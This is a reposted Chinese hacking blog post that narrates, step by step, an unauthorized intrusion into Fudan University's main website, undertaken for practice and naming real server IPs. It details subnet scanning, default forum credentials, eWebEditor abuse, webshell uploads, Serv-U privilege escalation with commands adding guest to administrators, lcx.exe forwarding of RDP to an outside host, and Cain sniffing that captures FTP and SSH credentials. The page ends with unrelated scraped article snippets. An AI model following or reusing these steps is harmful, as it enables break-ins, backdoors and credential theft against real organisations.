【渗透笔记】拿下复旦大学的艰难过程

转载自:L04sblog

一、师出有名

某日十分无聊,就和X论坛的超级版主wyzhack瞎吹牛,东年西扯的。后来不知道怎么的扯到复旦去了,他提议说不如我们黑掉复旦吧。正好当时也比较清闲,就答应一起看看了,嘿嘿。这次跑去黑复旦纯粹是为了练习技术。

二、战略部署

这次要拿的是复旦主站,分站可不是我们的目标了,嘿嘿。要不然拿个分站就挂上复旦的名义似乎有点说不过去。通过google顺利找到复旦大学主站:http://www.fudan.edu.cn/,如图1。

PHP的程序,打开了个链接,顺手加个单撇号,提示"警告!提交的数据非法!",又试了几个其他的注入关键字,都被过滤掉了。看来直接从主站下手难度比较大,所以我们得想点其他办法。这里我打算利用嗅探来获取目标站的重要信息,嘿嘿。我们都知道可以根据ping一个目标地址的TTL值来大致判断对方的服务器操作系统!我ping了一下复旦主站,发现TTL值为53,如图2。

这个数值大致就是Linux的操作系统的了,嘿嘿。要想嗅探就必须要取得与目标服务器同一网段下的某台服务器权限,然后再安装嗅探工具进行嗅探攻击。复旦主站的IP为:61.129.42.5,那我们就必须在61.129.42.*这个网段里先控制一台服务器!先用SuperScan3.0扫描整个C段的21端口,作用就是先看看有没有windows操作系统的服务器在这个网段里!至于为什么要扫21嘛,大家都清楚要是装了Serv-U的话要是没什么意外,提权应该是比较容易的嘛,嘿嘿。扫描结果出来了,有好几台装有Serv-U的,按经验,装了Serv-U的就肯定是windows系统的了!IP为61.129.42.42这台明显就是windows的系统,Serv-U的版本是6.3的,如图3。


0

三、步步为营  
 
现在目的很明确,就是要先控制住61.129.42.42这台服务器!在浏览器里面填入IP访问,发现页面有点难看,都是些doc文档下载的东西,对我们来说没什么用。我们可以通过查询域名绑定看看有些什么站在上面。我一般不用明小子查询,因为用它能查出来的已经很少了!用X以前介绍过的一个网站来查询吧,它查出来的比明小子查的数据要多且准!打开 http://www.seologs.com/ip-domains.html,在"Domain or IP address"里填上"61.129.42.42",然后点击"submit"提交,稍等一会就会返回查询结果的了,如图4。

只有两个,似乎不容乐观哦。居然打开两个都不能访问!后来访问了一下8000端口才有反应了,如图5。

光在这里面也看不出什么来,页面比较简单,可利用的地方不多。值得庆幸的是有个"在线论坛",打开看看,原来是动网的,嘿嘿。用默认的用户名和密码尝试登录,居然成功了进入了后台,如图6。

本以为可以很轻松的拿到webshell的,没想到这个破论坛既不能上传也不能备份!动网没了这两个功能基本上比较难拿到webshell了,郁闷!于是又上了邪恶八进制发帖讨论,没多久就在回复里面看到动网还有个后台列文件的漏洞!嘿嘿,这回似乎又有得搞了!大致方法就是在"基本设置"里修改"上传目录设定",然后到"上传文件管理"里面去查看结果。列了N久终于发现有可利用的东西了,如图7。

ewebeditor出现了,嘿嘿。点击打开后台登录页面,如图8。

 
 
尝试默认的用户名和密码发现无法登录进去,看来密码改过了。没关系,反正我们能列文件嘛。再利用动网列文件的漏洞找到了ewebeditor的数据库文件,下载回来,用明小子的数据库管理功能打开,查看了管理员密码的MD5散列,如图9。

再到MD5查询网站查询密码,幸运的是密码并不复杂,顺利查了出来,如图10。

用得到的用户名和密码成功登录了ewebeditor的后台,如图11。

进了ewebeditor拿webshell就比较轻松的了。样式管理-拷贝样式-设置-添加允许上传类型asa,再预览上传asa后缀的ASP马,然后在"上传文件管理"里就可以看到马的了,点击直接访问webshell,如图12。

在图12里面,我们可以看到有ASPNET这个用户,一般来说很有可能支持ASPX,因为ASPX马的权限一般要比ASP的高。所以我上传了一个ASPX马。然后再传了一个SU提权的ASP马,执行:"net user guest /active:yes" "net user guest password" "net localgroup administrators guest /add"三条命令,意思是先激活guest用户,再给guest用户设定一个密码,再把guest用户添加进管理员组。幸运的是Serv-U的默认连接密码没有改,命令都成功执行了。在ASPX马里执行:"net user guest"我们可以发现guest已经隶属于管理员组了,如图13。

 
 
用ASPX马读取了注册表的远程桌面服务端口,发现就是默认的3389,不过Terminal Services服务当时是没有开的。后来wyzhack放了鸽子才给开了,嘿嘿。  
 
四、守株待兔  
 
直接连接3389是行不通的,防火墙把我们挡在了外面。不过我们可以用lcx.exe给它来个端口转发。直接用ASPX马或者SU提权马发现都不能执行lcx.exe进行转发,所以我想通过修改Serv-U的配置文件来添加一个具体system权限的FTP用户,再登录上去进行端口转发。就是修改C:\Program Files\Serv-U\ServUDaemon.ini这个文件的内容啦。如何修改我就不废话了,有兴趣的话大家可以去了解下SU配置文件的存放规则,了解之后修改起来就得心应手的了。我就添加了一个用户名为hackest的,拥有system权限的FTP用户。要是配置文件没有权限修改的话,可以用SU提权马执行cacls.exe修改文件属性为everyone完全控制就可以修改的了,不过cacls.exe需要文件格式为NTFS的才可以使用哦。在CMD下登录FTP上去,执行:  
C:\Documents and Settings\All Users\Documents\lcx.exe -slave 219.129.213.252 51 127.0.0.1 3389 
本机执行:  
lcx.exe -listen 51 2007 
然后连接本机的的2007端口就可以登录远程服务器了,如图14。

到这里我们就已经成功控制了61.129.42.42这台服务器。接下来就是安装cain进行嗅探了,具体请参照我的另一篇关于嗅探入侵的文章。在61.129.42.42上执行"ipconfig /all"命令得知默认网关为61.129.42.1,如图15。

复旦主站的IP为:61.129.42.5。设置好cain就可以开始嗅探攻击了,嘿嘿。由于一开始的那几天是五一假期时间,嗅了两天一无所获。N天之后终于有进展了,wyzhack告诉我已经成功嗅探到复旦主站的FTP用户名和密码了,如图16。

对于一个网站,有了FTP密码就等于有了一切!利用FTP上传了一个PHP马,进去参观一下,如图17。

 
 
 
五、尘埃落定  
 
到这里就已经完全控制了复旦大学的主站了!虽然主站的操作系统是Linux,但是我们通过先控制一台windows的3389肉鸡再进行对目标的嗅探攻击收到了如期的效果。可见嗅探攻击的威力的确非比寻常,不注意这方面的防范也必将被人恶意入侵!既然是Linux的系统,管理员一般都是用SSH来远程管理服务器的,嘿嘿。扫描一下主站服务器,发现开了22端口(SSH的默认连接端口为22)尝试用嗅到的FTP用户名和密码登录SSH居然成功了,如图18。

至于通过溢出或者其他提权方法来得到root权限,我就不弄了,因为这方面实在不太熟悉。本文主要是介绍一种入侵思路,没有什么技术含量。不得不说的一句话:管理员们要小心嗅探攻击了,嗅探的攻击力可是比较厉害的。如有不妥之处还请大家批评斧正!

===========================

作者思路很清晰。运气很好啊。。。遇见没改密码的动网论坛。。

亮点算是能在论坛后台列目录吧。。顺利的列出了ewe编辑器后台以及数据库地址。可怜的ewe编辑器不知道害死了多少站长。

时间: 2024-12-12 16:15:23

【渗透笔记】拿下复旦大学的艰难过程的相关文章

渗透笔记大全

渗透笔记[ 常见网站程序 ] —————————————————————————————–asp类: foosun(风讯)kesion(科汛)newasp(新云)乔客CreateLive(创力)5uCMSKingCMSDvBBS(动网)BBSxp[博客]zblog[博客]pjblog —————————————————————————————– PHP类:DeDeCms(织梦)ECMS(帝国)PHPCMSPHP168HBcms(宏博)SupeSiteCMSware(思维)Joomla![BBS]

【渗透笔记】友情检测朋友公司并拿下shell过程

一朋友在一个百货公司上班,由于无聊危险漫步就友情检测了他们公司的网站,开始我们的检测之旅吧. 打开网站,发现网站挺不错,不愧是大卖场,页面做的挺花,但是安全性怎么样呢?来试试吧.先用工具扫了下后台,结果什么也没扫到,再到页面上找找有没有注入漏洞,找了半天也没找到有用的东西,看来这个站安全性不错,只好旁注了,打开ip.wen.la,查一下这个服务器上有多少个网站,发现服务器上还有另一个网站,打开一看,原来是他们公司的连锁超市的网站.来试试这个网站吧. 用御剑扫一下敏感目录,居然发现了EWEBEDI

【渗透笔记】拿下某小H网的全过程

自从班上A片小王子的7个T资源被封了以后,本小白为造福全班同学,尝试拿下个小H网,先用webrobot搜某些只有小H网才会出现的关键词 本以为直接导出放御剑里跑就行了,然并软.于是用awvs扫了一下,也没什么用.从cms下手吧放进椰树里 百度一下maxcms的漏洞看到这样一条 http://www.2cto.com/index.php/364.html发现注入点 http://www.xxxxx.com/inc/ajax.asp?action=videoscore&id=11 ,放进sqlmap

Java基础-学习笔记(五)——面向过程和面向对象的区别

学习面向对象的语言,要弄清楚面向对象,首先要从理解面向过程开始. 回想起之前在学习C语言时,每次拿到一个题目,首先想到的是,先分析出解决问题所需要的步骤,每一个功能点,用一个函数来表示,使用的时候一个一个进行调用就好了,程序的重心在函数上(谓语):面向对象,就是要把问题事务分解成各个对象,建立对象的目的不是为了完成一个步骤,而是为了描述每个事物在整个解决问题过程中的行为,强调的是对象本身(主语) 还有就是数据是单独存储还是与操作存储在一起.对面向过程而言,数据是独立的.而在面向对象中,对象本身就

程序员的自我修养笔记之一--被隐藏的过程

一个程序的正确执行需要经过4个阶段,分别是预处理(Preprecessing).编译(Compilation).汇编(Assenmbly)和链接(Linking). 1.预编译 预编译过程主要处理那些源代码文件中的以“#”开始的预编译指令.比如,“#include” “#define”等,主要处理规则如下: ①将所有的“#define”删除,并且展开所有的宏定义: ②处理所有条件预编译指令,比如"#if" "#ifdef" "#elif" &qu

WCF学习笔记(2)-WCF的通讯过程

一.WCF中的ABC 场景:公司让你送一份合同文件,送文件的过程你可以选择的交通方式有打的,地铁或公交. 到了对方公司后,你要找到某负责人,并且要一份收到合同文件的回执和相应文件 要完成这项工作任务主要以下几个步骤 1.知道对方公司的地址 即WCF中的A,通过Address我们可以找到我们要调用的WCF服务 2.选择交通方式 即WCF中的B,通过Binding来实现Client和Service通讯的所有底层细节. 传输采用什么编码,传输使用什么协议,等等 3.到了对方公司我们能做哪些事 即WCF

Hadoop 学习笔记四--JobTracker 的执行过程

Hadoop中MapReduce 的执行也是采用Master/Slave 主从结构的方式.其中JobTracker 充当了Master的角色,而TaskTracker 充当了Slave 的角色.Master负责接受客户端提交的Job,然后调度Job的每一个子任务Task运行于Slave上,并监控它们.如果发现所有失败的Task就重新运行它,slave则负责直接执行每一个Task. 当Hadoop启动的时候,JobTracker 是作为单独的一个JVM来运行的.JobTracker 会一直等待Jo

《Thinking in Java 4th Edition》读书笔记之1.1 抽象过程

Q:什么是面向对象?与面向过程的区别是什么? A:面向对象:即面向问题空间,基于问题进行抽象: 面向过程:即面向解空间,基于计算机结构进行抽象: OOP的五个基本特性: 1)万物皆对象. [解释] 可以抽取待求解问题的任何概念化构件,将其表示为程序中的对象. 2)程序是对象的集合,他们通过发送消息来告知彼此所要做的. [解释] 即对某个特定对象的方法的请求. 3)每个对象都有自己的由其他对象构成的存储. [解释] 可以通过创建包含现有对象的包的方式来创建新类型的对象,因此可以在程序中构建复杂的体

学习笔记-----Android的View绘制过程

边看源码边参考别人的博客等,做一下学习笔记. 要了解View的绘制,首先得知道View树的结构:(可以参考http://blog.csdn.net/qinjuning/article/details/7226787) 整个 View 树的绘图流程在ViewRoot.java类的performTraversals()函数展开,其绘制流程如下: 我们从最基本的思路来理解绘图流程:先确定所有View的大小,然后根据布局决定每个View的位置,然后开画! 这里着重关注具体绘图的Draw方法,其绘制流程为